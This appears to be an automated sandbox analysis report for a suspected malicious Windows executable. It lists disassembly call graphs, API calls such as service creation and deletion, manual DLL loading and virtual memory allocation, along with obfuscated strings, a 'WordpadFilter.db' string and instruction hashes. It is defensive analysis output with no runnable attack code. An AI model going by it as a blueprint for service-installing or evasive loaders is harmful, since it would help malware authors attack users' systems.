13973->13975 13977 140008510 _lock 3 API calls 13975->13977 13977->13969 13978 140005c56 14044 140009e30 13978->14044 13981 140005c5b 14062 140009c30 13981->14062 13985 140005c73 13986 140005c81 13985->13986 13988 1400084e0 _lock 12 API calls 13985->13988 14092 140009690 13986->14092 13988->13986 13989 140005c86 13990 140005c94 13989->13990 13991 1400084e0 _lock 12 API calls 13989->13991 14104 140008650 13990->14104 13991->13990 13993 140005c9e 13994 1400084e0 _lock 12 API calls 13993->13994 13995 140005ca9 13993->13995 13994->13995 14108 140001520 13995->14108 13997 140005ad3 13997->13954 13999 14000954e _lock 13998->13999 14000 14000959c 13999->14000 14001 14000961c 13999->14001 14003 1400095c9 GetStdHandle 13999->14003 14002 140009300 _lock 10 API calls 14000->14002 14001->13951 14002->14001 14003->14000 14004 1400095dc 14003->14004 14004->14000 14005 1400095e2 WriteFile 14004->14005 14005->14000 14009 140009320 _lock 14006->14009 14007 140009330 14007->13957 14008 1400094dc GetStdHandle 14008->14007 14010 1400094ef 14008->14010 14009->14007 14009->14008 14012 140009375 _lock 14009->14012 14010->14007 14011 1400094f5 WriteFile 14010->14011 14011->14007 14012->14007 14013 1400093b9 GetModuleFileNameA 14012->14013 14014 1400093d9 _lock 14013->14014 14126 14000f000 14014->14126 14018 140008543 ExitProcess 14017->14018 14019 14000852a GetProcAddress 14017->14019 14019->14018 14020 14000853f 14019->14020 14020->14018 14022 14000a334 14021->14022 14023 14000a339 HeapSetInformation 14021->14023 14022->13961 14023->13961 14152 140008370 14024->14152 14026 140005c48 14026->13978 14037 1400084e0 14026->14037 14027 14000a1c4 GetStdHandle 14034 14000a17c 14027->14034 14028 140008370 3 API calls 14031 140009f8a 14028->14031 14029 14000a239 SetHandleCount 14029->14026 14030 14000a1d8 GetFileType 14030->14034 14031->14026 14031->14028 14032 14000a0e3 14031->14032 14031->14034 14032->14026 14033 14000a11c GetFileType 14032->14033 14032->14034 14157 14000edc0 14032->14157 14033->14032 14034->14026 14034->14027 14034->14029 14034->14030 14036 14000edc0 _lock 3 API calls 14034->14036 14036->14034 14038 140009540 _lock 12 API calls 14037->14038 14039 1400084ed 14038->14039 14040 140009300 _lock 10 API calls 14039->14040 14041 1400084f4 14040->14041 14042 1400073e0 _lock LdrLoadDll 14041->14042 14043 140008500 14042->14043 14045 140009e7c 14044->14045 14046 140009e3e GetCommandLineW 14044->14046 14049 140009e81 GetCommandLineW 14045->14049 14050 140009e69 14045->14050 14047 140009e49 GetCommandLineW 14046->14047 14048 140009e5e GetLastError 14046->14048 14047->14048 14048->14050 14051 140009e75 14048->14051 14049->14050 14050->14051 14052 140009e91 GetCommandLineA MultiByteToWideChar 14050->14052 14051->13981 14053 140009ec8 14052->14053 14054 140009ed9 14052->14054 14053->13981 14055 140008370 3 API calls 14054->14055 14056 140009eeb 14055->14056 14057 140009f32 14056->14057 14058 140009ef3 MultiByteToWideChar 14056->14058 14057->13981 14059 140009f13 14058->14059 14060 140009f2a 14058->14060 14059->13981 14171 140008de0 14060->14171 14063 140009c52 GetEnvironmentStringsW 14062->14063 14067 140009c86 14062->14067 14064 140009c6c GetLastError 14063->14064 14072 140009c60 14063->14072 14066 140009c77 14064->14066 14064->14067 14065 140009c91 GetEnvironmentStringsW 14069 140005c67 14065->14069 14065->14072 14068 140009d09 GetEnvironmentStrings 14066->14068 14066->14069 14067->14065 14067->14066 14068->14069 14070 140009d17 14068->14070 14088 1400099c0 GetModuleFileNameW 14069->14088 14071 140009d58 14070->14071 14075 140009d20 MultiByteToWideChar 14070->14075 14076 140008370 3 API calls 14071->14076 14176 140008300 14072->14176 14075->14069 14075->14070 14079 140009d68 14076->14079 14077 140009ce1 __CxxFrameHandler 14083 140009cef FreeEnvironmentStringsW 14077->14083 14078 140009cd1 FreeEnvironmentStringsW 14078->14069 14080 140009d7d 14079->14080 14081 140009d70 FreeEnvironmentStringsA 14079->14081 14082 140009de5 FreeEnvironmentStringsA 14080->14082 14084 140009d90 MultiByteToWideChar 14080->14084 14081->14069 14082->14069 14083->14069 14084->14080 14085 140009e0e 14084->14085 14086 140008de0 _lock 2 API calls 14085->14086 14087 140009e16 FreeEnvironmentStringsA 14086->14087 14087->14069 14089 140009a03 14088->14089 14090 140008300 _lock 17 API calls 14089->14090 14091 140009bca 14089->14091 14090->14091 14091->13985 14093 1400096b2 14092->14093 14094 1400096a8 14092->14094 14095 140008370 3 API calls 14093->14095 14094->13989 14096 1400096fa 14095->14096 14097 140009709 14096->14097 14098 1400097a5 14096->14098 14100 140008370 3 API calls 14096->14100 14101 1400097e5 14096->14101 14097->13989 14099 140008de0 _lock 2 API calls 14098->14099 14103 1400097b4 14099->14103 14100->14096 14102 140008de0 _lock 2 API calls 14101->14102 14102->14103 14103->13989 14106 140008666 14104->14106 14107 1400086bf 14106->14107 14192 140005380 14106->14192 14107->13993 14109 140001565 14108->14109 14110 140001569 14109->14110 14111 14000157e 14109->14111 14230 140001430 GetModuleFileNameW OpenSCManagerW 14110->14230 14114 140001595 OpenSCManagerW 14111->14114 14115 14000164f 14111->14115 14118 1400015b2 GetLastError 14114->14118 14119 1400015cf OpenServiceW 14114->14119 14116 140001654 14115->14116 14117 140001669 StartServiceCtrlDispatcherW 14115->14117 14239 1400011f0 14116->14239 14117->13997 14118->13997 14121 140001611 DeleteService 14119->14121 14122 1400015e9 GetLastError CloseServiceHandle 14119->14122 14123 140001626 CloseServiceHandle CloseServiceHandle 14121->14123 14124 14000161e GetLastError 14121->14124 14122->13997 14123->13997 14124->14123 14127 14000f01e __CxxFrameHandler 14126->14127 14128 14000f03b LoadLibraryA 14127->14128 14129 14000f125 _lock 14127->14129 14130 14000f054 GetProcAddress 14128->14130 14131 1400094c9 14128->14131 14144 14000f165 14129->14144 14149 1400073e0 LdrLoadDll 14129->14149 14130->14131 14132 14000f06d _lock 14130->14132 14131->13957 14136 14000f075 GetProcAddress 14132->14136 14134 1400073e0 _lock LdrLoadDll 14134->14131 14135 1400073e0 _lock LdrLoadDll 14141 14000f1e9 14135->14141 14138 140007220 _lock 14136->14138 14140 14000f094 GetProcAddress 14138->14140 14139 1400073e0 _lock LdrLoadDll 14139->14144 14143 14000f0b3 _lock 14140->14143 14142 1400073e0 _lock LdrLoadDll 14141->14142 14145 14000f1a3 _lock 14141->14145 14142->14145 14143->14129 14146 14000f0e9 GetProcAddress 14143->14146 14144->14135 14144->14145 14145->14134 14147 14000f101 _lock 14146->14147 14147->14129 14148 14000f10d GetProcAddress 14147->14148 14148->14129 14150 140007333 14149->14150 14150->14149 14151 140007403 14150->14151 14151->14139 14153 1400083a0 14152->14153 14155 1400083e0 14153->14155 14156 1400083be Sleep 14153->14156 14163 14000e850 14153->14163 14155->14031 14156->14153 14156->14155 14158 1400073e0 _lock LdrLoadDll 14157->14158 14159 14000edec _lock 14158->14159 14160 14000ee1d _lock 14159->14160 14161 14000ee26 GetModuleHandleA 14159->14161 14160->14032 14161->14160 14162 14000ee38 GetProcAddress 14161->14162 14162->14160 14164 14000e865 14163->14164 14165 14000e8be HeapAlloc 14164->14165 14167 14000e876 _lock 14164->14167 14168 1400090b0 14164->14168 14165->14164 14165->14167 14167->14153 14169 1400073e0 _lock LdrLoadDll 14168->14169 14170 1400090c5 14169->14170 14170->14164 14172 140008de9 HeapFree 14171->14172 14173 140008e19 _lock 14171->14173 14172->14173 14174 140008dff _lock 14172->14174 14173->14057 14175 140008e09 GetLastError 14174->14175 14175->14173 14177 140008320 14176->14177 14179 140008338 Sleep 14177->14179 14180 140008358 14177->14180 14181 1400090f0 14177->14181 14179->14177 14179->14180 14180->14077 14180->14078 14182 14000919e 14181->14182 14189 140009103 14181->14189 14183 1400090b0 _lock LdrLoadDll 14182->14183 14185 1400091a3 _lock 14183->14185 14184 14000914c HeapAlloc 14184->14189 14191 140009173 _lock 14184->14191 14185->14177 14186 140009540 _lock 12 API calls 14186->14189 14187 140009300 _lock 10 API calls 14187->14189 14188 1400090b0 _lock LdrLoadDll 14188->14189 14189->14184 14189->14186 14189->14187 14189->14188 14190 140008510 _lock 3 API calls 14189->14190 14189->14191 14190->14189 14191->14177 14195 140005250 14192->14195 14194 140005389 14194->14107 14196 140005271 14195->14196 14197 1400073e0 _lock LdrLoadDll 14196->14197 14198 14000527e 14197->14198 14199 1400073e0 _lock LdrLoadDll 14198->14199 14200 14000528d 14199->14200 14206 1400052f0 _lock 14200->14206 14207 140008490 14200->14207 14202 1400052b5 14203 1400052d9 14202->14203 14202->14206 14210 140008400 14202->14210 14205 140008400 7 API calls 14203->14205 14203->14206 14205->14206 14206->14194 14208 1400084c5 HeapSize 14207->14208 14209 140008499 _lock 14207->14209 14209->14202 14212 140008430 14210->14212 14213 140008472 14212->14213 14214 140008450 Sleep 14212->14214 14215 14000e920 14212->14215 14213->14203 14214->14212 14214->14213 14216 14000e935 14215->14216 14217 14000e94c 14216->14217 14227 14000e95e 14216->14227 14218 140008de0 _lock 2 API calls 14217->14218 14221 14000e951 14218->14221 14219 14000e9b1 14220 1400090b0 _lock LdrLoadDll 14219->14220 14223 14000e9b9 _lock 14220->14223 14221->14212 14222 14000e973 HeapReAlloc 14222->14223 14222->14227 14223->14212 14224 14000e9f4 _lock 14226 14000e9f9 GetLastError 14224->14226 14225 1400090b0 _lock LdrLoadDll 14225->14227 14226->14223 14227->14219 14227->14222 14227->14224 14227->14225 14228 14000e9db _lock 14227->14228 14229 14000e9e0 GetLastError 14228->14229 14229->14223 14231 140001482 CreateServiceW 14230->14231 14232 14000147a GetLastError 14230->14232 14234 1400014ea GetLastError 14231->14234 14235 1400014df CloseServiceHandle 14231->14235 14233 1400014fd 14232->14233 14245 140004f30 14233->14245 14237 1400014f2 CloseServiceHandle 14234->14237 14235->14237 14237->14233 14238 14000150d 14238->13997 14240 1400011fa 14239->14240 14254 1400051d0 14240->14254 14243 140004f30 sprintf_s NtAllocateVirtualMemory 14244 140001262 14243->14244 14244->13997 14247 140004f39 __CxxFrameHandler 14245->14247 14246 140004f44 14246->14238 14247->14246 14250 140006c95 14247->14250 14249 14000660e sprintf_s 14249->14238 14252 140006d7b 14250->14252 14253 140006d9d 14250->14253 14251 140006f95 NtAllocateVirtualMemory 14251->14253 14252->14251 14252->14253 14253->14249 14257 140008270 14254->14257 14256 140001238 MessageBoxW 14256->14243 14258 14000827e 14257->14258 14260 1400082ac _lock 14257->14260 14258->14260 14261 140008120 14258->14261 14260->14256 14262 14000816a 14261->14262 14266 14000813b _lock 14261->14266 14264 1400081d7 14262->14264 14262->14266 14267 140007f50 14262->14267 14265 140007f50 sprintf_s 54 API calls 14264->14265 14264->14266 14265->14266 14266->14260 14276 140007f69 sprintf_s 14267->14276 14268 140007f74 _lock 14268->14264 14269 14000801d 14270 1400080d5 14269->14270 14271 14000802f 14269->14271 14272 14000cc00 sprintf_s 54 API calls 14270->14272 14273 14000804c 14271->14273 14275 140008081 14271->14275 14277 140008056 14272->14277 14283 14000cc00 14273->14283 14275->14277 14291 14000c2a0 14275->14291 14276->14268 14276->14269 14280 14000cd50 14276->14280 14277->14264 14281 140008300 _lock 17 API calls 14280->14281 14282 14000cd6a 14281->14282 14282->14269 14284 14000cc3f 14283->14284 14290 14000cc23 _lock sprintf_s 14283->14290 14284->14290 14299 14000fc50 14284->14299 14288 14000ccc5 _lock sprintf_s 14344 14000fd20 LeaveCriticalSection 14288->14344 14290->14277 14292 14000c2e0 14291->14292 14295 14000c2c3 _lock sprintf_s 14291->14295 14293 14000fc50 sprintf_s 25 API calls 14292->14293 14292->14295 14294 14000c34e 14293->14294 14296 14000c1f0 sprintf_s 2 API calls 14294->14296 14297 14000c367 _lock sprintf_s 14294->14297 14295->14277 14296->14297 14378 14000fd20 LeaveCriticalSection 14297->14378 14300 14000fc96 14299->14300 14301 14000fccb 14299->14301 14345 14000b400 14300->14345 14302 14000ccac 14301->14302 14303 14000fccf EnterCriticalSection 14301->14303 14302->14288 14309 14000c3f0 14302->14309 14303->14302 14311 14000c42e 14309->14311 14328 14000c427 _lock sprintf_s 14309->14328 14310 140004f30 sprintf_s NtAllocateVirtualMemory 14312 14000cbe6 14310->14312 14315 14000c4fb __CxxFrameHandler sprintf_s 14311->14315 14311->14328 14372 14000c1f0 14311->14372 14312->14288 14314 14000c841 14316 14000c86a 14314->14316 14317 14000cb20 WriteFile 14314->14317 14315->14314 14318 14000c526 GetConsoleMode 14315->14318 14320 14000c936 14316->14320 14324 14000c876 14316->14324 14319 14000cb53 GetLastError 14317->14319 14317->14328 14318->14314 14321 14000c557 14318->14321 14319->14328 14326 14000c940 14320->14326 14334 14000ca02 14320->14334 14321->14314 14322 14000c564 GetConsoleCP 14321->14322 14322->14328 14338 14000c581 sprintf_s 14322->14338 14323 14000c8c5 WriteFile 14323->14324 14325 14000c928 GetLastError 14323->14325 14324->14323 14324->14328 14325->14328 14326->14328 14329 14000c991 WriteFile 14326->14329 14327 14000ca57 WideCharToMultiByte 14330 14000cb15 GetLastError 14327->14330 14327->14334 14328->14310 14329->14326 14331 14000c9f4 GetLastError 14329->14331 14330->14328 14331->14328 14332 14000cab0 WriteFile 14333 14000caf6 GetLastError 14332->14333 14332->14334 14333->14328 14333->14334 14334->14327 14334->14328 14334->14332 14335 14000c649 WideCharToMultiByte 14335->14328 14336 14000c68c WriteFile 14335->14336 14336->14338 14339 14000c80d GetLastError 14336->14339 14337 14000c829 GetLastError 14337->14328 14338->14328 14338->14335 14338->14337 14340 14000fd50 7 API calls sprintf_s 14338->14340 14341 14000c6e2 WriteFile 14338->14341 14343 14000c81b GetLastError 14338->14343 14339->14328 14340->14338 14341->14338 14342 14000c7ff GetLastError 14341->14342 14342->14328 14343->14328 14346 14000b41e 14345->14346 14347 14000b42f EnterCriticalSection 14345->14347 14351 14000b2f0 14346->14351 14349 14000b423 14349->14347 14350 1400084e0 _lock 12 API calls 14349->14350 14350->14347 14352 14000b317 14351->14352 14354 14000b32e 14351->14354 14353 140009540 _lock 12 API calls 14352->14353 14355 14000b31c 14353->14355 14356 140008300 _lock 17 API calls 14354->14356 14360 14000b342 _lock 14354->14360 14357 140009300 _lock 10 API calls 14355->14357 14358 14000b350 14356->14358 14359 14000b324 14357->14359 14358->14360 14361 14000b400 _lock 22 API calls 14358->14361 14362 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14359->14362 14360->14349 14363 14000b371 14361->14363 14362->14354 14364 14000b3a7 14363->14364 14365 14000b379 14363->14365 14367 140008de0 _lock HeapFree GetLastError 14364->14367 14366 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14365->14366 14368 14000b386 14366->14368 14371 14000b392 _lock 14367->14371 14370 140008de0 _lock HeapFree GetLastError 14368->14370 14368->14371 14369 14000b3b0 LeaveCriticalSection 14369->14360 14370->14371 14371->14369 14373 14000c20c sprintf_s 14372->14373 14374 14000c212 _lock 14373->14374 14375 14000c22c SetFilePointer 14373->14375 14374->14315 14376 14000c24a GetLastError 14375->14376 14377 14000c254 sprintf_s 14375->14377 14376->14377 14377->14315 13944 140006c95 13946 140006d7b 13944->13946 13947 140006d9d 13944->13947 13945 140006f95 NtAllocateVirtualMemory 13945->13947 13946->13945 13946->13947 14379 1400054e0 14380 14000552c 14379->14380 14383 140005506 _lock 14379->14383 14392 1400074d0 14380->14392 14384 140008370 3 API calls 14388 140005545 __CxxFrameHandler 14384->14388 14385 1400055b8 14386 140008de0 _lock 2 API calls 14385->14386 14387 1400055c0 sprintf_s 14386->14387 14387->14383 14388->14385 14396 1400074f0 14388->14396 14391 1400055b0 GetLastError 14391->14385 14394 140007333 14392->14394 14393 140005536 14393->14384 14394->14393 14395 1400073e0 LdrLoadDll 14394->14395 14395->14394 14398 140007333 14396->14398 14397 140005561 CreateThread 14397->14387 14397->14391 14398->14397 14399 1400073e0 LdrLoadDll 14398->14399 14399->14398

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 150 140006e96 147->150 151 140006e9b 147->151 149 140006edc-140006ee9 148->149 152 140006f89-140006f8e 149->152 153 140006eef-140006f23 149->153 150->132 151->146 157 140006f95-140006fd6 NtAllocateVirtualMemory 152->157 158 140006f90 152->158 155 140006f25-140006f2d 153->155 156 140006f2f-140006f33 153->156 159 140006f37-140006f7a 155->159 156->159 157->132 160 140006fdc-140007020 157->160 158->132 161 140006f84 159->161 162 140006f7c-140006f80 159->162 163 14000702c-140007037 160->163 161->149 162->161 165 140007039-140007058 163->165 166 14000705a-140007062 163->166 165->163 167 14000706e-14000707b 166->167 169 140007081-140007094 167->169 170 140007148-14000715e 167->170 171 140007096-1400070a9 169->171 172 1400070ab 169->172 173 1400072e2-1400072eb 170->173 174 140007164-14000717a 170->174 171->172 175 1400070ad-1400070db 171->175 176 140007064-14000706a 172->176 174->173 177 1400070ea-140007101 175->177 176->167 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @$@
                                      • API String ID: 0-149943524
                                      • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                      • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                      • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                      • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 268 1400074b4 265->268 269 140007480-1400074b3 265->269 270 1400074eb-14000752b 266->270 271 14000752c-140007535 266->271 268->271 269->268 270->271 272 140007552 271->272 273 140007537-140007554 271->273 272->260 273->264 274->256 275->260
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                      • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                      • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                      • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: File$CreateReadmalloc
                                      • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                      • API String ID: 3950102678-3381721293
                                      • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                      • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                      • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                      • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 25 7ffe1a451c00-7ffe1a451c06 26 7ffe1a451c41-7ffe1a451c4b 25->26 27 7ffe1a451c08-7ffe1a451c0b 25->27 30 7ffe1a451d68-7ffe1a451d7d 26->30 28 7ffe1a451c35-7ffe1a451c74 call 7ffe1a452470 27->28 29 7ffe1a451c0d-7ffe1a451c10 27->29 48 7ffe1a451d42 28->48 49 7ffe1a451c7a-7ffe1a451c8f call 7ffe1a452304 28->49 31 7ffe1a451c12-7ffe1a451c15 29->31 32 7ffe1a451c28 __scrt_dllmain_crt_thread_attach 29->32 33 7ffe1a451d7f 30->33 34 7ffe1a451d8c-7ffe1a451da6 call 7ffe1a452304 30->34 36 7ffe1a451c21-7ffe1a451c26 call 7ffe1a4523b4 31->36 37 7ffe1a451c17-7ffe1a451c20 31->37 40 7ffe1a451c2d-7ffe1a451c34 32->40 38 7ffe1a451d81-7ffe1a451d8b 33->38 46 7ffe1a451ddb-7ffe1a451e0c call 7ffe1a452630 34->46 47 7ffe1a451da8-7ffe1a451dd9 call 7ffe1a45242c call 7ffe1a4522d4 call 7ffe1a4527b4 call 7ffe1a4525d0 call 7ffe1a4525f4 call 7ffe1a45245c 34->47 36->40 59 7ffe1a451e0e-7ffe1a451e14 46->59 60 7ffe1a451e1d-7ffe1a451e23 46->60 47->38 52 7ffe1a451d44-7ffe1a451d59 48->52 57 7ffe1a451c95-7ffe1a451ca6 call 7ffe1a452374 49->57 58 7ffe1a451d5a-7ffe1a451d67 call 7ffe1a452630 49->58 75 7ffe1a451cf7-7ffe1a451d01 call 7ffe1a4525d0 57->75 76 7ffe1a451ca8-7ffe1a451ccc call 7ffe1a452778 call 7ffe1a4522c4 call 7ffe1a4522e8 call 7ffe1a457b10 57->76 58->30 59->60 64 7ffe1a451e16-7ffe1a451e18 59->64 65 7ffe1a451e65-7ffe1a451e6d call 7ffe1a451720 60->65 66 7ffe1a451e25-7ffe1a451e2f 60->66 71 7ffe1a451f02-7ffe1a451f0f 64->71 77 7ffe1a451e72-7ffe1a451e7b 65->77 72 7ffe1a451e31-7ffe1a451e34 66->72 73 7ffe1a451e36-7ffe1a451e3c 66->73 78 7ffe1a451e3e-7ffe1a451e44 72->78 73->78 75->48 99 7ffe1a451d03-7ffe1a451d0f call 7ffe1a452620 75->99 76->75 127 7ffe1a451cce-7ffe1a451cd5 __scrt_dllmain_after_initialize_c 76->127 84 7ffe1a451eb3-7ffe1a451eb5 77->84 85 7ffe1a451e7d-7ffe1a451e7f 77->85 80 7ffe1a451e4a-7ffe1a451e5f call 7ffe1a451c00 78->80 81 7ffe1a451ef8-7ffe1a451f00 78->81 80->65 80->81 81->71 88 7ffe1a451ebc-7ffe1a451ed1 call 7ffe1a451c00 84->88 89 7ffe1a451eb7-7ffe1a451eba 84->89 85->84 94 7ffe1a451e81-7ffe1a451ea3 call 7ffe1a451720 call 7ffe1a451d68 85->94 88->81 108 7ffe1a451ed3-7ffe1a451edd 88->108 89->81 89->88 94->84 122 7ffe1a451ea5-7ffe1a451eaa 94->122 115 7ffe1a451d35-7ffe1a451d40 99->115 116 7ffe1a451d11-7ffe1a451d1b call 7ffe1a452538 99->116 113 7ffe1a451ee4-7ffe1a451ef2 108->113 114 7ffe1a451edf-7ffe1a451ee2 108->114 119 7ffe1a451ef4 113->119 114->119 115->52 116->115 126 7ffe1a451d1d-7ffe1a451d2b 116->126 119->81 122->84 126->115 127->75 128 7ffe1a451cd7-7ffe1a451cf4 call 7ffe1a457acc 127->128 128->75
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                      • String ID:
                                      • API String ID: 190073905-0
                                      • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                      • Instruction ID: 4931b8e3540be6d53536b331fe21849d5235993418f92d03439bf41bbbab9444
                                      • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                      • Instruction Fuzzy Hash: FD819FA1F08F4386FA54BB6B944127922A0AF45FA0F4444F7EA5D477B6DF3CE8A58600

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                      • String ID: WordpadFilter.db
                                      • API String ID: 868324331-3647581008
                                      • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                      • Instruction ID: e7ed906b2f0c003a35873891de72104b0e4e86fe8bb7b52e4c2e4fe40ae8f53b
                                      • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                      • Instruction Fuzzy Hash: EA315A32B15F4199E700EBA2D8402BD73B5EB88B98F1485B6EE8C13B55EF38D1A1C340

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
